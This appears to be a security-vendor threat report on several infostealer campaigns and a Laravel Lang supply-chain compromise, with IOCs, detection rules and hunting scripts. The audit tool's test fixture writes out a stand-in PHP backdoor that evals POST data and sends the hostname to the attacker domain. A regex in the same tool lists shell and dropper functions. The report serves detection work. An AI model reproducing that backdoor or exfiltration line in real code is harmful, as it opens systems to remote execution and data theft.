
TwizAdmin, JINX-0164, & Laravel Compromise: Multi-Vector Credential Theft & Supply Chain Analysis

Security Arsenal Team
May 28, 2026
6 min read

Threat Summary

Analysis of the latest OTX pulses indicates a coordinated surge in credential theft and infostealer operations targeting the cryptocurrency sector, software developers, and major event attendees. Threat actors are leveraging diverse attack vectors including supply chain compromises (Laravel Lang), social engineering (JINX-0164), and phishing-as-a-service (GHOST STADIUM).

The campaigns are primarily financially motivated, focusing on stealing cryptocurrency wallet seed phrases (TwizAdmin), browser credentials (Vidar, Lumma), and developer session tokens (AUDIOFIX). Notably, adversaries are evolving C2 infrastructure, utilizing blockchain smart contracts (ClearFake) and FastAPI panels to evade takedowns and manage multi-stage malware operations.

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin & crpx0)

  • Distribution: Malvertisements and phishing campaigns impersonating FedEx.
  • Payload Behavior: Multi-stage operation featuring a cryptocurrency clipper supporting 8 chains, BIP-39 seed phrase theft, and browser credential exfiltration.
  • C2 Communication: Managed via a FastAPI-based panel located at exposed IP 103.241.66[.]238.
  • Persistence: A Java RAT builder with a license-key system provides persistent access on Windows and macOS; a ransomware module (crpx0) is bundled alongside it.

JINX-0164 (AUDIOFIX & MINIRAT)

  • Distribution: LinkedIn social engineering targeting crypto industry professionals, posing as recruiters. Also utilizes supply chain attacks via malicious npm packages.
  • Payload Behavior: Delivers AUDIOFIX (Python-based infostealer/RAT) and MINIRAT (Go backdoor) tailored for macOS.
  • C2 Communication: Uses typosquatted domains like login.teamicrosoft.com and live.ong to blend in with legitimate traffic.

GHOST STADIUM

  • Distribution: Facebook advertising exploitation and over 4,300 fraudulent domains impersonating FIFA 2026 infrastructure.
  • Payload Behavior: Deploys Vidar and Lumma stealers to harvest credentials and financial data from victims seeking World Cup tickets.
  • C2 Communication: Operates a Phishing-as-a-Service ecosystem with pixel-perfect clones of authentication systems.
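The JINX-0164 and GHOST STADIUM domains above share a pattern: a real brand name embedded in, or placed next to, a registrable domain the brand does not own (login.teamicrosoft.com, live.ong, teams.live.us.org, fifa.gold). The following screen, added here as an example and not tooling from the pulse, classifies hostnames by that pattern. The brand list, the allowlist of legitimate zones and the "last two labels are the registrable domain" simplification are assumptions to be tuned before using the output to block.

```python
"""Lookalike-domain screen for hostnames of the kind seen in this pulse.

Added example, not tooling from the pulse. BRANDS, LEGIT and the
'registrable domain = last two labels' simplification are assumptions."""
from typing import Optional

BRANDS = ("fifa", "live", "microsoft", "teams")          # assumed brands being impersonated
LEGIT = {"fifa.com", "live.com", "microsoft.com"}          # assumed allowlist of real zones


def levenshtein(a: str, b: str) -> int:
    """Edit distance, for one-character near-misses such as micros0ft."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(hostname: str) -> Optional[str]:
    """Return why the hostname looks like a brand lookalike, or None if it does not."""
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    # Simplification: no public-suffix list offline, so the last two labels are
    # taken as the registrable domain (wrong for zones such as co.uk).
    sld, tld = labels[-2], labels[-1]
    registrable = f"{sld}.{tld}"
    if registrable in LEGIT:
        return None                                        # the real zone or a host inside it
    if sld in BRANDS:
        return f"tld-swap: brand '{sld}' registered under '.{tld}'"
    for brand in BRANDS:
        if brand in sld:
            return f"brand-embedded: '{brand}' inside '{registrable}'"
        if levenshtein(sld, brand) == 1:
            return f"near-miss: '{sld}' is one edit from '{brand}'"
    brand_subdomains = sorted(set(labels[:-2]) & set(BRANDS))
    if brand_subdomains:
        return f"brand-as-subdomain: {brand_subdomains} in front of '{registrable}'"
    return None


def screen(hostnames) -> dict:
    """Classify each hostname; only flagged ones are returned."""
    out = {}
    for h in hostnames:
        reason = classify(h)
        if reason:
            out[h] = reason
    return out


if __name__ == "__main__":
    sample = ["login.teamicrosoft.com", "live.ong", "teams.live.us.org", "fifa.gold",
              "micros0ft.com", "www.microsoft.com", "fifa.com", "outlook.live.com"]
    for host, why in screen(sample).items():
        print(f"{host:28} {why}")
```

Short brand names such as "live" and "teams" will match inside unrelated words (olive, steams), so run the screen over DNS or proxy logs as a hunting aid and feed confirmed hits into the blocklist rather than blocking on it directly.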

ClearFake / SectopRAT

  • Distribution: Compromised Swiss websites injected with malicious JavaScript.
  • Payload Behavior: Uses "EtherHiding" to store C2 instructions inside smart contracts on the BNB Smart Chain testnet, delivering SectopRAT and ACRStealer.
  • Anti-Analysis: C2 instructions stored on-chain cannot be removed by defenders (the attacker can still update them), so infrastructure takedowns are nearly impossible; detection has to focus on the injected loader script and the domains it contacts.

Laravel Lang Supply Chain

  • Distribution: Compromised community-maintained packages (laravel-lang/lang, etc.) on package repositories.
  • Payload Behavior: Remote Code Execution (RCE) backdoor allowing deployment of helpers.php stealer and DebugChromium.exe.
  • C2 Communication: Exfiltration to flipboxstudio.info.

IOC Analysis

The provided indicators encompass a wide range of infrastructure:

  • Domains & URLs: High volume of suspicious domains (e.g., fanonlyatn.xyz, fifa.gold, flipboxstudio.info) used for C2 communication and payload delivery. SOC teams should immediately block these at the proxy and DNS layer.
  • File Hashes (SHA256): Multiple hashes associated with TwizAdmin, JINX-0164, and the Laravel backdoor. These should be added to EDR blocklists and used to scan user directories and temp folders.
  • Hostnames & Typosquatting: Indicators like login.teamicrosoft.com suggest sophisticated social engineering aiming to bypass email filters via lookalike domains.
  • Operationalization: Tools like Splunk, QRadar, or Microsoft Sentinel can ingest these STIX objects. Automated playbooks should trigger isolation upon detection of connections to flipboxstudio.info or execution of the listed SHA256 hashes.
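When these indicators are operationalised in a SIEM or in a local hunt, two details decide whether the rules are useful: hostnames must be matched on label boundaries (a rule for fifa.gold must not fire on www.fifa.com, and one for flipboxstudio.info must not fire on notflipboxstudio.info), and the hash must be pulled out of whatever field the sensor uses (Defender exposes SHA256 directly, Sysmon packs it into a Hashes string). The matcher below, added here as an example rather than tooling from the pulse, runs the pulse's domains, the TwizAdmin panel IP and the four SHA256 values over constructed Sysmon-style JSON events.

```python
"""IOC matching over endpoint telemetry for the indicators in this pulse.

Added example (not tooling from the pulse): hostnames are matched on label
boundaries and Sysmon's 'Hashes' field is parsed for SHA256. The event
records in SAMPLE_EVENTS are constructed, not real telemetry."""
import json
from typing import Dict, List

# Indicators quoted in the pulse; the panel IP is shown defanged in the text.
IOC_DOMAINS = {
    "fanonlyatn.xyz", "fifa.gold", "flipboxstudio.info", "live.ong",
    "login.teamicrosoft.com", "driver-updater.net", "teams.live.us.org",
    "veloitall.cfd", "xamir3on.lat", "srv-auth-dlt-msh.in.net",
}
IOC_IPS = {"103.241.66.238"}
IOC_SHA256 = {
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17",
}


def host_matches(hostname: str, indicator: str) -> bool:
    """True when hostname is the indicator or a subdomain of it (label boundary, not substring)."""
    h = hostname.lower().rstrip(".")
    return h == indicator or h.endswith("." + indicator)


def sha256_of(event: Dict) -> str:
    """Extract SHA256 from a Defender-style 'SHA256' field or a Sysmon 'Hashes' string ('SHA256=..,MD5=..')."""
    if event.get("SHA256"):
        return event["SHA256"].lower()
    for part in event.get("Hashes", "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""


def match_event(event: Dict) -> List[str]:
    """Return the indicators an event matches, sorted for stable output."""
    hits = []
    host = event.get("DestinationHostname") or event.get("RemoteUrl") or ""
    hits += [f"domain:{ioc}" for ioc in IOC_DOMAINS if host_matches(host, ioc)]
    ip = event.get("DestinationIp") or event.get("RemoteIP")
    if ip in IOC_IPS:
        hits.append(f"ip:{ip}")
    sha = sha256_of(event)
    if sha in IOC_SHA256:
        hits.append(f"sha256:{sha}")
    return sorted(hits)


def triage(jsonl: str) -> List[Dict]:
    """Run match_event over JSON-lines telemetry; one record per event that hit anything."""
    findings = []
    for lineno, line in enumerate(jsonl.splitlines(), 1):
        if not line.strip():
            continue
        event = json.loads(line)
        hits = match_event(event)
        if hits:
            findings.append({"line": lineno, "image": event.get("Image", ""), "hits": hits})
    return findings


# Constructed sample telemetry (not real logs): Sysmon EID 3 network connections and one EID 1 process start.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"EventID": 3, "Image": r"C:\Users\dev\AppData\Local\Temp\update.exe",
                "DestinationHostname": "afraid.veloitall.cfd", "DestinationIp": "203.0.113.10"}),
    json.dumps({"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                "DestinationHostname": "www.fifa.com", "DestinationIp": "203.0.113.20"}),
    json.dumps({"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
                "DestinationHostname": "notflipboxstudio.info", "DestinationIp": "203.0.113.30"}),
    json.dumps({"EventID": 1, "Image": r"C:\Users\dev\Downloads\FedEx_Invoice.exe",
                "Hashes": "SHA256=06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092,"
                          "MD5=d41d8cd98f00b204e9800998ecf8427e"}),
    json.dumps({"EventID": 3, "Image": r"C:\Users\dev\AppData\Roaming\node.exe",
                "DestinationHostname": "", "DestinationIp": "103.241.66.238"}),
    json.dumps({"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
                "DestinationHostname": "login.teamicrosoft.com", "DestinationIp": "203.0.113.40"}),
])

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"line {f['line']}: {f['image']} -> {', '.join(f['hits'])}")
```

Of the six constructed events only four should fire: the ClearFake subdomain, the hash match on the FedEx-themed dropper, the bare-IP connection to the FastAPI panel, and the typosquatted login host; the www.fifa.com and notflipboxstudio.info connections are the substring traps that a `contains` rule would wrongly alert on.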

Detection Engineering

Sigma Rules

YAML
title: Potential TwizAdmin C2 Communication
id: 2b3c4d5e-6f7a-8b9c-0d1e-2f3a4b5c6d7e
description: Detects network connections to known TwizAdmin C2 infrastructure fanonlyatn.xyz.
status: experimental
date: 2026-05-28
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|contains: 'fanonlyatn.xyz'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.command_and_control
    - malware.twizadmin

---

title: Laravel Lang Compromise C2 Activity
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects connections to flipboxstudio.info associated with the Laravel Lang RCE backdoor.
status: experimental
date: 2026-05-28
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains: 'flipboxstudio.info'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.initial_access
    - attack.t1195.001
    - attack.command_and_control

---

title: ClearFake Smart Contract C2 Domain Access
id: 9f8e7d6c-5b4a-3f2e-1d0c-9b8a7f6e5d4c
description: Detects connections to domains associated with ClearFake blockchain C2 infrastructure.
status: experimental
date: 2026-05-28
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|endswith:
            - '.veloitall.cfd'
            - '.xamir3on.lat'
            - '.srv-auth-dlt-msh.in.net'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.defense_evasion
    - attack.command_and_control
    - malware.clearfake

KQL (Microsoft Sentinel)

KQL
// Hunt for connections to TwizAdmin, JINX-0164, GHOST STADIUM and Laravel C2 infrastructure
let iocDomains = dynamic(["fanonlyatn.xyz", "flipboxstudio.info", "live.ong", "driver-updater.net", "login.teamicrosoft.com", "fifa.gold"]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (iocDomains)
       or RemoteIP == "103.241.66.238"                                   // TwizAdmin FastAPI panel
       // FIFA-themed lookalikes: the legitimate fifa.com zone is excluded so the hunt does not drown in ticket-site traffic
       or (RemoteUrl contains "fifa." and RemoteUrl !endswith "fifa.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP

// Hunt for execution of known malicious hashes from pulses
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA256 in~ ("06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527", "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOC Hunt for TwizAdmin, Laravel Backdoor, and JINX-0164 Indicators.
.DESCRIPTION
    Checks the hosts file and the local DNS client cache for the listed domains, then
    hashes the image of every running process and compares it with the known SHA256 values.
    Run from an elevated prompt so that system processes can be inspected; without
    elevation the script still runs but skips processes it cannot open.
#>

$MaliciousDomains = @(
    "fanonlyatn.xyz",
    "flipboxstudio.info",
    "live.ong",
    "driver-updater.net",
    "login.teamicrosoft.com",
    "teams.live.us.org",
    "afraid.veloitall.cfd"
)

$MaliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
)

# 1. Check the hosts file for malicious domains (the domain is regex-escaped so '.' matches literally)
Write-Host "Checking Hosts file for malicious domain entries..."
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath -ErrorAction SilentlyContinue
    foreach ($Domain in $MaliciousDomains) {
        $Pattern = [regex]::Escape($Domain)
        if ($HostsContent -match $Pattern) {
            Write-Host "[ALERT] Malicious domain found in hosts file: $Domain" -ForegroundColor Red
        }
    }
}

# 2. Check the DNS client cache: a cached record means something on this host resolved the name recently
Write-Host "Checking DNS client cache for malicious domains..."
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($Domain in $MaliciousDomains) {
    $Hits = $DnsCache | Where-Object { $_.Entry -eq $Domain -or $_.Entry -like "*.$Domain" }
    foreach ($Hit in $Hits) {
        Write-Host "[ALERT] Malicious domain in DNS cache: $($Hit.Entry) -> $($Hit.Data)" -ForegroundColor Red
    }
}

# 3. Scan running processes for known IOCs (each image path is hashed only once)
Write-Host "Scanning running processes for known malicious hashes..."
try {
    $Processes = Get-Process -IncludeUserName -ErrorAction Stop   # -IncludeUserName needs elevation
} catch {
    $Processes = Get-Process
}
$HashCache = @{}
foreach ($Proc in $Processes) {
    try {
        $FilePath = $Proc.Path
        if (-not $FilePath -or -not (Test-Path $FilePath)) { continue }
        if (-not $HashCache.ContainsKey($FilePath)) {
            $HashCache[$FilePath] = (Get-FileHash -Path $FilePath -Algorithm SHA256 -ErrorAction Stop).Hash.ToLower()
        }
        if ($HashCache[$FilePath] -in $MaliciousHashes) {
            Write-Host "[ALERT] Malicious process detected: $($Proc.ProcessName) (PID: $($Proc.Id), User: $($Proc.UserName))" -ForegroundColor Red
            Write-Host "Path: $FilePath" -ForegroundColor Red
        }
    } catch {
        # Access denied on protected or system processes: skip rather than abort the hunt
        continue
    }
}

Write-Host "Hunt complete."

Response Priorities

  • Immediate:
    • Block all listed domains and IPs at the network perimeter and proxy level.
    • Scan all endpoints for the SHA256 hashes listed in the IOC section.
    • Investigate recent Laravel project updates and composer operations for signs of the helpers.php backdoor.
  • 24h:
    • If credential-stealing malware (TwizAdmin, Vidar, Lumma) is detected, force a password reset and session-token revocation across user accounts, prioritising developers and finance teams.
    • Audit LinkedIn messages received by development staff for JINX-0164 recruitment lures.
  • 1 Week:
    • Add Software Composition Analysis (SCA) checks so that compromised Laravel Lang versions are flagged as soon as they are pinned in composer.lock.
    • Update browser isolation policies to mitigate drive-by downloads from ClearFake campaigns.
    • Conduct security awareness training focused on crypto-clipping and high-profile event phishing (FIFA World Cup).
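For the Laravel Lang items above (the immediate composer investigation and the one-week SCA check), the audit below is an added example, not tooling from the pulse or from the Laravel Lang project. It reads composer.lock to list which laravel-lang/* packages a project pins and where their dists were fetched from, then walks vendor/laravel-lang for the two artefacts named in the pulse (helpers.php and DebugChromium.exe) and for PHP that references the exfiltration domain or calls the functions a dropper needs. The project it runs against is a constructed fixture with a placeholder version and dist URL; the expectation that genuine dists come from GitHub and the suspicious-PHP pattern list are heuristics assumed here, so treat hits as review items rather than proof of compromise.

```python
"""Audit of a Laravel project for the Laravel Lang compromise described in this pulse.

Added example, not tooling from the pulse. The fixture is constructed; the
GitHub-dist expectation and SUSPICIOUS_PHP patterns are assumed heuristics."""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List
from urllib.parse import urlparse

C2_DOMAIN = "flipboxstudio.info"                        # exfiltration domain named in the pulse
EXPECTED_DIST_HOSTS = {"api.github.com", "github.com"}  # assumption: where genuine dists come from
SUSPICIOUS_PHP = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|curl_exec|shell_exec|passthru|system)\s*\(", re.I)


def audit_lock(lock_path: Path) -> List[Dict]:
    """List laravel-lang/* packages pinned in composer.lock and flag dists from unexpected hosts."""
    lock = json.loads(lock_path.read_text())
    findings = []
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if not pkg.get("name", "").startswith("laravel-lang/"):
            continue
        dist_url = pkg.get("dist", {}).get("url", "")
        host = urlparse(dist_url).hostname or ""
        issues = []
        if host not in EXPECTED_DIST_HOSTS:
            issues.append(f"dist served from unexpected host '{host or '(none)'}'")
        findings.append({"package": pkg["name"], "version": pkg.get("version", ""),
                         "dist_url": dist_url, "issues": issues})
    return findings


def scan_vendor(vendor: Path) -> List[Dict]:
    """Walk vendor/laravel-lang and report named artefacts and PHP that looks like a stealer."""
    hits = []
    root = vendor / "laravel-lang"
    if not root.is_dir():
        return hits
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        reasons = []
        name = path.name.lower()
        if name == "debugchromium.exe":
            reasons.append("DebugChromium.exe dropped inside vendor tree")
        if name == "helpers.php":
            reasons.append("helpers.php present (artefact named in the pulse)")
        if path.suffix.lower() == ".php":
            text = path.read_text(errors="ignore")
            if C2_DOMAIN in text:
                reasons.append(f"references {C2_DOMAIN}")
            m = SUSPICIOUS_PHP.search(text)
            if m:
                reasons.append(f"calls {m.group(1)}()")
        if reasons:
            hits.append({"path": path.relative_to(vendor).as_posix(), "reasons": reasons})
    return hits


def audit_project(project: Path) -> Dict:
    """Combine the lock-file review and the vendor scan for one project root."""
    return {"packages": audit_lock(project / "composer.lock"),
            "vendor_hits": scan_vendor(project / "vendor")}


def build_fixture(project: Path) -> None:
    """Constructed project: one laravel-lang package from a non-GitHub dist plus planted artefacts."""
    lock = {"packages": [
        {"name": "laravel/framework", "version": "0.0.0-fixture",
         "dist": {"type": "zip", "url": "https://api.github.com/repos/laravel/framework/zipball/fixture"}},
        {"name": "laravel-lang/lang", "version": "0.0.0-fixture",
         "dist": {"type": "zip", "url": "https://example.invalid/dist/laravel-lang-lang.zip"}},
    ]}
    (project / "composer.lock").write_text(json.dumps(lock))
    pkg = project / "vendor" / "laravel-lang" / "lang"
    (pkg / "src").mkdir(parents=True)
    (pkg / "src" / "Locale.php").write_text("<?php\nreturn ['welcome' => 'Welcome'];\n")
    (pkg / "helpers.php").write_text(           # constructed stand-in for the backdoor, never executed
        "<?php\n"
        "if (isset($_POST['c'])) { eval(base64_decode($_POST['c'])); }\n"
        "@file_get_contents('https://flipboxstudio.info/?h=' . gethostname());\n")
    (pkg / "DebugChromium.exe").write_bytes(b"MZ" + b"\x00" * 62)


def demo() -> Dict:
    """Build the fixture in a temporary directory and run the audit against it."""
    with tempfile.TemporaryDirectory() as tmp:
        project = Path(tmp)
        build_fixture(project)
        return audit_project(project)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Point `audit_project` at a real checkout and compare the reported dist URLs with what `composer show -v` prints from a clean machine; a laravel-lang package whose dist was fetched from anywhere other than the project's GitHub zipballs, or whose directory contains files the release tag does not, is the first thing to pull for analysis.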
